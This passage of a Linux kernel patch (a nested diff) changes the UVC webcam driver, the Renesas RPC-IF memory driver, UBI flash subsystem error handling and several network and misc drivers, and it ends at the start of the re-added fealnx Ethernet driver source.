+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -2480,6 +2450,24 @@ static const struct usb_device_id uvc_ids[] = {
+ 	  .bInterfaceSubClass	= 1,
+ 	  .bInterfaceProtocol	= 0,
+ 	  .driver_info		= (kernel_ulong_t)&uvc_quirk_probe_minmax },
++	/* Logitech, Webcam C910 */
++	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
++				| USB_DEVICE_ID_MATCH_INT_INFO,
++	  .idVendor		= 0x046d,
++	  .idProduct		= 0x0821,
++	  .bInterfaceClass	= USB_CLASS_VIDEO,
++	  .bInterfaceSubClass	= 1,
++	  .bInterfaceProtocol	= 0,
++	  .driver_info		= UVC_INFO_QUIRK(UVC_QUIRK_WAKE_AUTOSUSPEND)},
++	/* Logitech, Webcam B910 */
++	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
++				| USB_DEVICE_ID_MATCH_INT_INFO,
++	  .idVendor		= 0x046d,
++	  .idProduct		= 0x0823,
++	  .bInterfaceClass	= USB_CLASS_VIDEO,
++	  .bInterfaceSubClass	= 1,
++	  .bInterfaceProtocol	= 0,
++	  .driver_info		= UVC_INFO_QUIRK(UVC_QUIRK_WAKE_AUTOSUSPEND)},
+ 	/* Logitech Quickcam Fusion */
+ 	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
+ 				| USB_DEVICE_ID_MATCH_INT_INFO,
+diff --git a/drivers/media/usb/uvc/uvc_entity.c b/drivers/media/usb/uvc/uvc_entity.c
+index 7c4d2f93d3513..cc68dd24eb42d 100644
+--- a/drivers/media/usb/uvc/uvc_entity.c
++++ b/drivers/media/usb/uvc/uvc_entity.c
+@@ -37,7 +37,7 @@ static int uvc_mc_create_links(struct uvc_video_chain *chain,
+ 			continue;
+ 
+ 		remote = uvc_entity_by_id(chain->dev, entity->baSourceID[i]);
+-		if (remote == NULL)
++		if (remote == NULL || remote->num_pads == 0)
+ 			return -EINVAL;
+ 
+ 		source = (UVC_ENTITY_TYPE(remote) == UVC_TT_STREAMING)
+diff --git a/drivers/media/usb/uvc/uvc_status.c b/drivers/media/usb/uvc/uvc_status.c
+index 7518ffce22edb..4a92c989cf335 100644
+--- a/drivers/media/usb/uvc/uvc_status.c
++++ b/drivers/media/usb/uvc/uvc_status.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/kernel.h>
+ #include <linux/input.h>
+ #include <linux/slab.h>
+@@ -309,5 +310,41 @@ int uvc_status_start(struct uvc_device *dev, gfp_t flags)
+ 
+ void uvc_status_stop(struct uvc_device *dev)
+ {
++	struct uvc_ctrl_work *w = &dev->async_ctrl;
++
++	/*
++	 * Prevent the asynchronous control handler from requeing the URB. The
++	 * barrier is needed so the flush_status change is visible to other
++	 * CPUs running the asynchronous handler before usb_kill_urb() is
++	 * called below.
++	 */
++	smp_store_release(&dev->flush_status, true);
++
++	/*
++	 * Cancel any pending asynchronous work. If any status event was queued,
++	 * process it synchronously.
++	 */
++	if (cancel_work_sync(&w->work))
++		uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
++
++	/* Kill the urb. */
+ 	usb_kill_urb(dev->int_urb);
++
++	/*
++	 * The URB completion handler may have queued asynchronous work. This
++	 * won't resubmit the URB as flush_status is set, but it needs to be
++	 * cancelled before returning or it could then race with a future
++	 * uvc_status_start() call.
++	 */
++	if (cancel_work_sync(&w->work))
++		uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
++
++	/*
++	 * From this point, there are no events on the queue and the status URB
++	 * is dead. No events will be queued until uvc_status_start() is called.
++	 * The barrier is needed to make sure that flush_status is visible to
++	 * uvc_ctrl_status_event_work() when uvc_status_start() will be called
++	 * again.
++	 */
++	smp_store_release(&dev->flush_status, false);
+ }
+diff --git a/drivers/media/usb/uvc/uvc_v4l2.c b/drivers/media/usb/uvc/uvc_v4l2.c
+index 0774a11360c03..950b42d78a107 100644
+--- a/drivers/media/usb/uvc/uvc_v4l2.c
++++ b/drivers/media/usb/uvc/uvc_v4l2.c
+@@ -661,8 +661,6 @@ static int uvc_ioctl_enum_fmt(struct uvc_streaming *stream,
+ 	fmt->flags = 0;
+ 	if (format->flags & UVC_FMT_FLAG_COMPRESSED)
+ 		fmt->flags |= V4L2_FMT_FLAG_COMPRESSED;
+-	strscpy(fmt->description, format->name, sizeof(fmt->description));
+-	fmt->description[sizeof(fmt->description) - 1] = 0;
+ 	fmt->pixelformat = format->fcc;
+ 	return 0;
+ }
+diff --git a/drivers/media/usb/uvc/uvc_video.c b/drivers/media/usb/uvc/uvc_video.c
+index d2eb9066e4dcc..0d3a3b697b2d8 100644
+--- a/drivers/media/usb/uvc/uvc_video.c
++++ b/drivers/media/usb/uvc/uvc_video.c
+@@ -1352,7 +1352,9 @@ static void uvc_video_decode_meta(struct uvc_streaming *stream,
+ 	if (has_scr)
+ 		memcpy(stream->clock.last_scr, scr, 6);
+ 
+-	memcpy(&meta->length, mem, length);
++	meta->length = mem[0];
++	meta->flags  = mem[1];
++	memcpy(meta->buf, &mem[2], length - 2);
+ 	meta_buf->bytesused += length + sizeof(meta->ns) + sizeof(meta->sof);
+ 
+ 	uvc_dbg(stream->dev, FRAME,
+@@ -1965,6 +1967,17 @@ static int uvc_video_start_transfer(struct uvc_streaming *stream,
+ 			"Selecting alternate setting %u (%u B/frame bandwidth)\n",
+ 			altsetting, best_psize);
+ 
++		/*
++		 * Some devices, namely the Logitech C910 and B910, are unable
++		 * to recover from a USB autosuspend, unless the alternate
++		 * setting of the streaming interface is toggled.
++		 */
++		if (stream->dev->quirks & UVC_QUIRK_WAKE_AUTOSUSPEND) {
++			usb_set_interface(stream->dev->udev, intfnum,
++					  altsetting);
++			usb_set_interface(stream->dev->udev, intfnum, 0);
++		}
++
+ 		ret = usb_set_interface(stream->dev->udev, intfnum, altsetting);
+ 		if (ret < 0)
+ 			return ret;
+diff --git a/drivers/media/usb/uvc/uvcvideo.h b/drivers/media/usb/uvc/uvcvideo.h
+index 1227ae63f85b7..33e7475d4e64a 100644
+--- a/drivers/media/usb/uvc/uvcvideo.h
++++ b/drivers/media/usb/uvc/uvcvideo.h
+@@ -74,6 +74,7 @@
+ #define UVC_QUIRK_RESTORE_CTRLS_ON_INIT	0x00000400
+ #define UVC_QUIRK_FORCE_Y8		0x00000800
+ #define UVC_QUIRK_FORCE_BPP		0x00001000
++#define UVC_QUIRK_WAKE_AUTOSUSPEND	0x00002000
+ 
+ /* Format flags */
+ #define UVC_FMT_FLAG_COMPRESSED		0x00000001
+@@ -264,8 +265,6 @@ struct uvc_format {
+ 	u32 fcc;
+ 	u32 flags;
+ 
+-	char name[32];
+-
+ 	unsigned int nframes;
+ 	struct uvc_frame *frame;
+ };
+@@ -559,6 +558,7 @@ struct uvc_device {
+ 	/* Status Interrupt Endpoint */
+ 	struct usb_host_endpoint *int_ep;
+ 	struct urb *int_urb;
++	bool flush_status;
+ 	u8 *status;
+ 	struct input_dev *input;
+ 	char input_phys[64];
+diff --git a/drivers/memory/renesas-rpc-if.c b/drivers/memory/renesas-rpc-if.c
+index 09cd4318a83d8..5be3b46cd55f1 100644
+--- a/drivers/memory/renesas-rpc-if.c
++++ b/drivers/memory/renesas-rpc-if.c
+@@ -163,14 +163,36 @@ static const struct regmap_access_table rpcif_volatile_table = {
+ 	.n_yes_ranges	= ARRAY_SIZE(rpcif_volatile_ranges),
+ };
+ 
++struct rpcif_priv {
++	struct device *dev;
++	void __iomem *base;
++	void __iomem *dirmap;
++	struct regmap *regmap;
++	struct reset_control *rstc;
++	struct platform_device *vdev;
++	size_t size;
++	enum rpcif_type type;
++	enum rpcif_data_dir dir;
++	u8 bus_size;
++	u8 xfer_size;
++	void *buffer;
++	u32 xferlen;
++	u32 smcr;
++	u32 smadr;
++	u32 command;		/* DRCMR or SMCMR */
++	u32 option;		/* DROPR or SMOPR */
++	u32 enable;		/* DRENR or SMENR */
++	u32 dummy;		/* DRDMCR or SMDMCR */
++	u32 ddr;		/* DRDRENR or SMDRENR */
++};
+ 
+ /*
+  * Custom accessor functions to ensure SM[RW]DR[01] are always accessed with
+- * proper width.  Requires rpcif.xfer_size to be correctly set before!
++ * proper width.  Requires rpcif_priv.xfer_size to be correctly set before!
+  */
+ static int rpcif_reg_read(void *context, unsigned int reg, unsigned int *val)
+ {
+-	struct rpcif *rpc = context;
++	struct rpcif_priv *rpc = context;
+ 
+ 	switch (reg) {
+ 	case RPCIF_SMRDR0:
+@@ -206,7 +228,7 @@ static int rpcif_reg_read(void *context, unsigned int reg, unsigned int *val)
+ 
+ static int rpcif_reg_write(void *context, unsigned int reg, unsigned int val)
+ {
+-	struct rpcif *rpc = context;
++	struct rpcif_priv *rpc = context;
+ 
+ 	switch (reg) {
+ 	case RPCIF_SMWDR0:
+@@ -253,39 +275,18 @@ static const struct regmap_config rpcif_regmap_config = {
+ 	.volatile_table	= &rpcif_volatile_table,
+ };
+ 
+-int rpcif_sw_init(struct rpcif *rpc, struct device *dev)
++int rpcif_sw_init(struct rpcif *rpcif, struct device *dev)
+ {
+-	struct platform_device *pdev = to_platform_device(dev);
+-	struct resource *res;
++	struct rpcif_priv *rpc = dev_get_drvdata(dev);
+ 
+-	rpc->dev = dev;
+-
+-	rpc->base = devm_platform_ioremap_resource_byname(pdev, "regs");
+-	if (IS_ERR(rpc->base))
+-		return PTR_ERR(rpc->base);
+-
+-	rpc->regmap = devm_regmap_init(&pdev->dev, NULL, rpc, &rpcif_regmap_config);
+-	if (IS_ERR(rpc->regmap)) {
+-		dev_err(&pdev->dev,
+-			"failed to init regmap for rpcif, error %ld\n",
+-			PTR_ERR(rpc->regmap));
+-		return	PTR_ERR(rpc->regmap);
+-	}
+-
+-	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "dirmap");
+-	rpc->dirmap = devm_ioremap_resource(&pdev->dev, res);
+-	if (IS_ERR(rpc->dirmap))
+-		return PTR_ERR(rpc->dirmap);
+-	rpc->size = resource_size(res);
+-
+-	rpc->type = (uintptr_t)of_device_get_match_data(dev);
+-	rpc->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+-
+-	return PTR_ERR_OR_ZERO(rpc->rstc);
++	rpcif->dev = dev;
++	rpcif->dirmap = rpc->dirmap;
++	rpcif->size = rpc->size;
++	return 0;
+ }
+ EXPORT_SYMBOL(rpcif_sw_init);
+ 
+-static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif *rpc)
++static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif_priv *rpc)
+ {
+ 	regmap_write(rpc->regmap, RPCIF_PHYWR, 0xa5390000);
+ 	regmap_write(rpc->regmap, RPCIF_PHYADD, 0x80000000);
+@@ -299,8 +300,9 @@ static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif *rpc)
+ 	regmap_write(rpc->regmap, RPCIF_PHYADD, 0x80000032);
+ }
+ 
+-int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
++int rpcif_hw_init(struct rpcif *rpcif, bool hyperflash)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	u32 dummy;
+ 
+ 	pm_runtime_get_sync(rpc->dev);
+@@ -364,7 +366,7 @@ int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
+ }
+ EXPORT_SYMBOL(rpcif_hw_init);
+ 
+-static int wait_msg_xfer_end(struct rpcif *rpc)
++static int wait_msg_xfer_end(struct rpcif_priv *rpc)
+ {
+ 	u32 sts;
+ 
+@@ -373,7 +375,7 @@ static int wait_msg_xfer_end(struct rpcif *rpc)
+ 					USEC_PER_SEC);
+ }
+ 
+-static u8 rpcif_bits_set(struct rpcif *rpc, u32 nbytes)
++static u8 rpcif_bits_set(struct rpcif_priv *rpc, u32 nbytes)
+ {
+ 	if (rpc->bus_size == 2)
+ 		nbytes /= 2;
+@@ -386,9 +388,11 @@ static u8 rpcif_bit_size(u8 buswidth)
+ 	return buswidth > 4 ? 2 : ilog2(buswidth);
+ }
+ 
+-void rpcif_prepare(struct rpcif *rpc, const struct rpcif_op *op, u64 *offs,
++void rpcif_prepare(struct rpcif *rpcif, const struct rpcif_op *op, u64 *offs,
+ 		   size_t *len)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
++
+ 	rpc->smcr = 0;
+ 	rpc->smadr = 0;
+ 	rpc->enable = 0;
+@@ -472,8 +476,9 @@ void rpcif_prepare(struct rpcif *rpc, const struct rpcif_op *op, u64 *offs,
+ }
+ EXPORT_SYMBOL(rpcif_prepare);
+ 
+-int rpcif_manual_xfer(struct rpcif *rpc)
++int rpcif_manual_xfer(struct rpcif *rpcif)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	u32 smenr, smcr, pos = 0, max = rpc->bus_size == 2 ? 8 : 4;
+ 	int ret = 0;
+ 
+@@ -593,7 +598,7 @@ exit:
+ err_out:
+ 	if (reset_control_reset(rpc->rstc))
+ 		dev_err(rpc->dev, "Failed to reset HW\n");
+-	rpcif_hw_init(rpc, rpc->bus_size == 2);
++	rpcif_hw_init(rpcif, rpc->bus_size == 2);
+ 	goto exit;
+ }
+ EXPORT_SYMBOL(rpcif_manual_xfer);
+@@ -640,8 +645,9 @@ static void memcpy_fromio_readw(void *to,
+ 	}
+ }
+ 
+-ssize_t rpcif_dirmap_read(struct rpcif *rpc, u64 offs, size_t len, void *buf)
++ssize_t rpcif_dirmap_read(struct rpcif *rpcif, u64 offs, size_t len, void *buf)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	loff_t from = offs & (rpc->size - 1);
+ 	size_t size = rpc->size - from;
+ 
+@@ -674,8 +680,11 @@ EXPORT_SYMBOL(rpcif_dirmap_read);
+ 
+ static int rpcif_probe(struct platform_device *pdev)
+ {
++	struct device *dev = &pdev->dev;
+ 	struct platform_device *vdev;
+ 	struct device_node *flash;
++	struct rpcif_priv *rpc;
++	struct resource *res;
+ 	const char *name;
+ 	int ret;
+ 
+@@ -696,11 +705,40 @@ static int rpcif_probe(struct platform_device *pdev)
+ 	}
+ 	of_node_put(flash);
+ 
++	rpc = devm_kzalloc(&pdev->dev, sizeof(*rpc), GFP_KERNEL);
++	if (!rpc)
++		return -ENOMEM;
++
++	rpc->base = devm_platform_ioremap_resource_byname(pdev, "regs");
++	if (IS_ERR(rpc->base))
++		return PTR_ERR(rpc->base);
++
++	rpc->regmap = devm_regmap_init(dev, NULL, rpc, &rpcif_regmap_config);
++	if (IS_ERR(rpc->regmap)) {
++		dev_err(dev, "failed to init regmap for rpcif, error %ld\n",
++			PTR_ERR(rpc->regmap));
++		return	PTR_ERR(rpc->regmap);
++	}
++
++	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "dirmap");
++	rpc->dirmap = devm_ioremap_resource(dev, res);
++	if (IS_ERR(rpc->dirmap))
++		return PTR_ERR(rpc->dirmap);
++	rpc->size = resource_size(res);
++
++	rpc->type = (uintptr_t)of_device_get_match_data(dev);
++	rpc->rstc = devm_reset_control_get_exclusive(dev, NULL);
++	if (IS_ERR(rpc->rstc))
++		return PTR_ERR(rpc->rstc);
++
+ 	vdev = platform_device_alloc(name, pdev->id);
+ 	if (!vdev)
+ 		return -ENOMEM;
+ 	vdev->dev.parent = &pdev->dev;
+-	platform_set_drvdata(pdev, vdev);
++
++	rpc->dev = &pdev->dev;
++	rpc->vdev = vdev;
++	platform_set_drvdata(pdev, rpc);
+ 
+ 	ret = platform_device_add(vdev);
+ 	if (ret) {
+@@ -713,9 +751,9 @@ static int rpcif_probe(struct platform_device *pdev)
+ 
+ static int rpcif_remove(struct platform_device *pdev)
+ {
+-	struct platform_device *vdev = platform_get_drvdata(pdev);
++	struct rpcif_priv *rpc = platform_get_drvdata(pdev);
+ 
+-	platform_device_unregister(vdev);
++	platform_device_unregister(rpc->vdev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mfd/arizona-core.c b/drivers/mfd/arizona-core.c
+index bd7ee3260d53f..c166fcd331f11 100644
+--- a/drivers/mfd/arizona-core.c
++++ b/drivers/mfd/arizona-core.c
+@@ -45,7 +45,7 @@ int arizona_clk32k_enable(struct arizona *arizona)
+ 	if (arizona->clk32k_ref == 1) {
+ 		switch (arizona->pdata.clk32k_src) {
+ 		case ARIZONA_32KZ_MCLK1:
+-			ret = pm_runtime_get_sync(arizona->dev);
++			ret = pm_runtime_resume_and_get(arizona->dev);
+ 			if (ret != 0)
+ 				goto err_ref;
+ 			ret = clk_prepare_enable(arizona->mclk[ARIZONA_MCLK1]);
+diff --git a/drivers/misc/mei/bus-fixup.c b/drivers/misc/mei/bus-fixup.c
+index 6df7679d97391..92c0930cc742c 100644
+--- a/drivers/misc/mei/bus-fixup.c
++++ b/drivers/misc/mei/bus-fixup.c
+@@ -151,7 +151,7 @@ static int mei_fwver(struct mei_cl_device *cldev)
+ 	ret = __mei_cl_send(cldev->cl, (u8 *)&req, sizeof(req), 0,
+ 			    MEI_CL_IO_TX_BLOCKING);
+ 	if (ret < 0) {
+-		dev_err(&cldev->dev, "Could not send ReqFWVersion cmd\n");
++		dev_err(&cldev->dev, "Could not send ReqFWVersion cmd ret = %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -163,7 +163,7 @@ static int mei_fwver(struct mei_cl_device *cldev)
+ 		 * Should be at least one version block,
+ 		 * error out if nothing found
+ 		 */
+-		dev_err(&cldev->dev, "Could not read FW version\n");
++		dev_err(&cldev->dev, "Could not read FW version ret = %d\n", bytes_recv);
+ 		return -EIO;
+ 	}
+ 
+@@ -380,7 +380,7 @@ static int mei_nfc_if_version(struct mei_cl *cl,
+ 	ret = __mei_cl_send(cl, (u8 *)&cmd, sizeof(cmd), 0,
+ 			    MEI_CL_IO_TX_BLOCKING);
+ 	if (ret < 0) {
+-		dev_err(bus->dev, "Could not send IF version cmd\n");
++		dev_err(bus->dev, "Could not send IF version cmd ret = %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -395,7 +395,7 @@ static int mei_nfc_if_version(struct mei_cl *cl,
+ 	bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length, &vtag,
+ 				   0, 0);
+ 	if (bytes_recv < 0 || (size_t)bytes_recv < if_version_length) {
+-		dev_err(bus->dev, "Could not read IF version\n");
++		dev_err(bus->dev, "Could not read IF version ret = %d\n", bytes_recv);
+ 		ret = -EIO;
+ 		goto err;
+ 	}
+diff --git a/drivers/misc/vmw_balloon.c b/drivers/misc/vmw_balloon.c
+index 61a2be712bf7b..9ce9b9e0e9b63 100644
+--- a/drivers/misc/vmw_balloon.c
++++ b/drivers/misc/vmw_balloon.c
+@@ -1709,7 +1709,7 @@ static void __init vmballoon_debugfs_init(struct vmballoon *b)
+ static void __exit vmballoon_debugfs_exit(struct vmballoon *b)
+ {
+ 	static_key_disable(&balloon_stat_enabled.key);
+-	debugfs_remove(debugfs_lookup("vmmemctl", NULL));
++	debugfs_lookup_and_remove("vmmemctl", NULL);
+ 	kfree(b->stats);
+ 	b->stats = NULL;
+ }
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index a901f8edfa41d..7f65af1697519 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -468,6 +468,7 @@ static int uif_init(struct ubi_device *ubi)
+ 			err = ubi_add_volume(ubi, ubi->volumes[i]);
+ 			if (err) {
+ 				ubi_err(ubi, "cannot add volume %d", i);
++				ubi->volumes[i] = NULL;
+ 				goto out_volumes;
+ 			}
+ 		}
+@@ -663,6 +664,12 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 	ubi->ec_hdr_alsize = ALIGN(UBI_EC_HDR_SIZE, ubi->hdrs_min_io_size);
+ 	ubi->vid_hdr_alsize = ALIGN(UBI_VID_HDR_SIZE, ubi->hdrs_min_io_size);
+ 
++	if (ubi->vid_hdr_offset && ((ubi->vid_hdr_offset + UBI_VID_HDR_SIZE) >
++	    ubi->vid_hdr_alsize)) {
++		ubi_err(ubi, "VID header offset %d too large.", ubi->vid_hdr_offset);
++		return -EINVAL;
++	}
++
+ 	dbg_gen("min_io_size      %d", ubi->min_io_size);
+ 	dbg_gen("max_write_size   %d", ubi->max_write_size);
+ 	dbg_gen("hdrs_min_io_size %d", ubi->hdrs_min_io_size);
+diff --git a/drivers/mtd/ubi/fastmap-wl.c b/drivers/mtd/ubi/fastmap-wl.c
+index 0ee452275578d..863f571f1adb5 100644
+--- a/drivers/mtd/ubi/fastmap-wl.c
++++ b/drivers/mtd/ubi/fastmap-wl.c
+@@ -146,13 +146,15 @@ void ubi_refill_pools(struct ubi_device *ubi)
+ 	if (ubi->fm_anchor) {
+ 		wl_tree_add(ubi->fm_anchor, &ubi->free);
+ 		ubi->free_count++;
++		ubi->fm_anchor = NULL;
+ 	}
+ 
+-	/*
+-	 * All available PEBs are in ubi->free, now is the time to get
+-	 * the best anchor PEBs.
+-	 */
+-	ubi->fm_anchor = ubi_wl_get_fm_peb(ubi, 1);
++	if (!ubi->fm_disabled)
++		/*
++		 * All available PEBs are in ubi->free, now is the time to get
++		 * the best anchor PEBs.
++		 */
++		ubi->fm_anchor = ubi_wl_get_fm_peb(ubi, 1);
+ 
+ 	for (;;) {
+ 		enough = 0;
+diff --git a/drivers/mtd/ubi/vmt.c b/drivers/mtd/ubi/vmt.c
+index 8fcc0bdf06358..2c867d16f89f7 100644
+--- a/drivers/mtd/ubi/vmt.c
++++ b/drivers/mtd/ubi/vmt.c
+@@ -464,7 +464,7 @@ int ubi_resize_volume(struct ubi_volume_desc *desc, int reserved_pebs)
+ 		for (i = 0; i < -pebs; i++) {
+ 			err = ubi_eba_unmap_leb(ubi, vol, reserved_pebs + i);
+ 			if (err)
+-				goto out_acc;
++				goto out_free;
+ 		}
+ 		spin_lock(&ubi->volumes_lock);
+ 		ubi->rsvd_pebs += pebs;
+@@ -512,8 +512,10 @@ out_acc:
+ 		ubi->avail_pebs += pebs;
+ 		spin_unlock(&ubi->volumes_lock);
+ 	}
++	return err;
++
+ out_free:
+-	kfree(new_eba_tbl);
++	ubi_eba_destroy_table(new_eba_tbl);
+ 	return err;
+ }
+ 
+@@ -580,6 +582,7 @@ int ubi_add_volume(struct ubi_device *ubi, struct ubi_volume *vol)
+ 	if (err) {
+ 		ubi_err(ubi, "cannot add character device for volume %d, error %d",
+ 			vol_id, err);
++		vol_release(&vol->dev);
+ 		return err;
+ 	}
+ 
+@@ -590,15 +593,14 @@ int ubi_add_volume(struct ubi_device *ubi, struct ubi_volume *vol)
+ 	vol->dev.groups = volume_dev_groups;
+ 	dev_set_name(&vol->dev, "%s_%d", ubi->ubi_name, vol->vol_id);
+ 	err = device_register(&vol->dev);
+-	if (err)
+-		goto out_cdev;
++	if (err) {
++		cdev_del(&vol->cdev);
++		put_device(&vol->dev);
++		return err;
++	}
+ 
+ 	self_check_volumes(ubi);
+ 	return err;
+-
+-out_cdev:
+-	cdev_del(&vol->cdev);
+-	return err;
+ }
+ 
+ /**
+diff --git a/drivers/mtd/ubi/wl.c b/drivers/mtd/ubi/wl.c
+index 68eb0f21b3fe2..9e14319225c97 100644
+--- a/drivers/mtd/ubi/wl.c
++++ b/drivers/mtd/ubi/wl.c
+@@ -890,8 +890,11 @@ static int wear_leveling_worker(struct ubi_device *ubi, struct ubi_work *wrk,
+ 
+ 	err = do_sync_erase(ubi, e1, vol_id, lnum, 0);
+ 	if (err) {
+-		if (e2)
++		if (e2) {
++			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e2);
++			spin_unlock(&ubi->wl_lock);
++		}
+ 		goto out_ro;
+ 	}
+ 
+@@ -973,11 +976,11 @@ out_error:
+ 	spin_lock(&ubi->wl_lock);
+ 	ubi->move_from = ubi->move_to = NULL;
+ 	ubi->move_to_put = ubi->wl_scheduled = 0;
++	wl_entry_destroy(ubi, e1);
++	wl_entry_destroy(ubi, e2);
+ 	spin_unlock(&ubi->wl_lock);
+ 
+ 	ubi_free_vid_buf(vidb);
+-	wl_entry_destroy(ubi, e1);
+-	wl_entry_destroy(ubi, e2);
+ 
+ out_ro:
+ 	ubi_ro_mode(ubi);
+@@ -1130,14 +1133,18 @@ static int __erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk)
+ 		/* Re-schedule the LEB for erasure */
+ 		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, false);
+ 		if (err1) {
++			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e);
++			spin_unlock(&ubi->wl_lock);
+ 			err = err1;
+ 			goto out_ro;
+ 		}
+ 		return err;
+ 	}
+ 
++	spin_lock(&ubi->wl_lock);
+ 	wl_entry_destroy(ubi, e);
++	spin_unlock(&ubi->wl_lock);
+ 	if (err != -EIO)
+ 		/*
+ 		 * If this is not %-EIO, we have no idea what to do. Scheduling
+@@ -1253,6 +1260,18 @@ int ubi_wl_put_peb(struct ubi_device *ubi, int vol_id, int lnum,
+ retry:
+ 	spin_lock(&ubi->wl_lock);
+ 	e = ubi->lookuptbl[pnum];
++	if (!e) {
++		/*
++		 * This wl entry has been removed for some errors by other
++		 * process (eg. wear leveling worker), corresponding process
++		 * (except __erase_worker, which cannot concurrent with
++		 * ubi_wl_put_peb) will set ubi ro_mode at the same time,
++		 * just ignore this wl entry.
++		 */
++		spin_unlock(&ubi->wl_lock);
++		up_read(&ubi->fm_protect);
++		return 0;
++	}
+ 	if (e == ubi->move_from) {
+ 		/*
+ 		 * User is putting the physical eraseblock which was selected to
+diff --git a/drivers/net/dsa/ocelot/felix_vsc9959.c b/drivers/net/dsa/ocelot/felix_vsc9959.c
+index 01ac70fd7ddf1..4b6e4e5b47283 100644
+--- a/drivers/net/dsa/ocelot/felix_vsc9959.c
++++ b/drivers/net/dsa/ocelot/felix_vsc9959.c
+@@ -513,7 +513,7 @@ static const char * const vsc9959_resource_names[TARGET_MAX] = {
+  * SGMII/QSGMII MAC PCS can be found.
+  */
+ static const struct resource vsc9959_imdio_res =
+-	DEFINE_RES_MEM_NAMED(0x8030, 0x8040, "imdio");
++	DEFINE_RES_MEM_NAMED(0x8030, 0x10, "imdio");
+ 
+ static const struct reg_field vsc9959_regfields[REGFIELD_MAX] = {
+ 	[ANA_ADVLEARN_VLAN_CHK] = REG_FIELD(ANA_ADVLEARN, 6, 6),
+diff --git a/drivers/net/dsa/ocelot/seville_vsc9953.c b/drivers/net/dsa/ocelot/seville_vsc9953.c
+index 88ed3a2e487a4..fa03254adcefd 100644
+--- a/drivers/net/dsa/ocelot/seville_vsc9953.c
++++ b/drivers/net/dsa/ocelot/seville_vsc9953.c
+@@ -893,8 +893,8 @@ static int vsc9953_mdio_bus_alloc(struct ocelot *ocelot)
+ 
+ 	rc = mscc_miim_setup(dev, &bus, "VSC9953 internal MDIO bus",
+ 			     ocelot->targets[GCB],
+-			     ocelot->map[GCB][GCB_MIIM_MII_STATUS & REG_MASK]);
+-
++			     ocelot->map[GCB][GCB_MIIM_MII_STATUS & REG_MASK],
++			     true);
+ 	if (rc) {
+ 		dev_err(dev, "failed to setup MDIO bus\n");
+ 		return rc;
+diff --git a/drivers/net/ethernet/Kconfig b/drivers/net/ethernet/Kconfig
+index 323ec56e8a74c..1917da7841919 100644
+--- a/drivers/net/ethernet/Kconfig
++++ b/drivers/net/ethernet/Kconfig
+@@ -132,6 +132,16 @@ source "drivers/net/ethernet/mscc/Kconfig"
+ source "drivers/net/ethernet/microsoft/Kconfig"
+ source "drivers/net/ethernet/moxa/Kconfig"
+ source "drivers/net/ethernet/myricom/Kconfig"
++
++config FEALNX
++	tristate "Myson MTD-8xx PCI Ethernet support"
++	depends on PCI
++	select CRC32
++	select MII
++	help
++	  Say Y here to support the Myson MTD-800 family of PCI-based Ethernet
++	  cards. <http://www.myson.com.tw/>
++
+ source "drivers/net/ethernet/ni/Kconfig"
+ source "drivers/net/ethernet/natsemi/Kconfig"
+ source "drivers/net/ethernet/neterion/Kconfig"
+diff --git a/drivers/net/ethernet/Makefile b/drivers/net/ethernet/Makefile
+index 2fedbaa545eb1..0d872d4efcd10 100644
+--- a/drivers/net/ethernet/Makefile
++++ b/drivers/net/ethernet/Makefile
+@@ -64,6 +64,7 @@ obj-$(CONFIG_NET_VENDOR_MICROCHIP) += microchip/
+ obj-$(CONFIG_NET_VENDOR_MICROSEMI) += mscc/
+ obj-$(CONFIG_NET_VENDOR_MOXART) += moxa/
+ obj-$(CONFIG_NET_VENDOR_MYRI) += myricom/
++obj-$(CONFIG_FEALNX) += fealnx.o
+ obj-$(CONFIG_NET_VENDOR_NATSEMI) += natsemi/
+ obj-$(CONFIG_NET_VENDOR_NETERION) += neterion/
+ obj-$(CONFIG_NET_VENDOR_NETRONOME) += netronome/
+diff --git a/drivers/net/ethernet/fealnx.c b/drivers/net/ethernet/fealnx.c
+new file mode 100644
+index 0000000000000..ed18450fd2cc5
+--- /dev/null
++++ b/drivers/net/ethernet/fealnx.c
+@@ -0,0 +1,1953 @@
++/*
++	Written 1998-2000 by Donald Becker.
++
++	This software may be used and distributed according to the terms of
++	the GNU General Public License (GPL), incorporated herein by reference.
++	Drivers based on or derived from this code fall under the GPL and must
++	retain the authorship, copyright and license notice.  This file is not
++	a complete program and may only be used when the entire operating
++	system is licensed under the GPL.
++
++	The author may be reached as becker@scyld.com, or C/O
++	Scyld Computing Corporation
++	410 Severn Ave., Suite 210
++	Annapolis MD 21403
++
++	Support information and updates available at
++	http://www.scyld.com/network/pci-skeleton.html
++
++	Linux kernel updates:
++
++	Version 2.51, Nov 17, 2001 (jgarzik):
++	- Add ethtool support
++	- Replace some MII-related magic numbers with constants
++
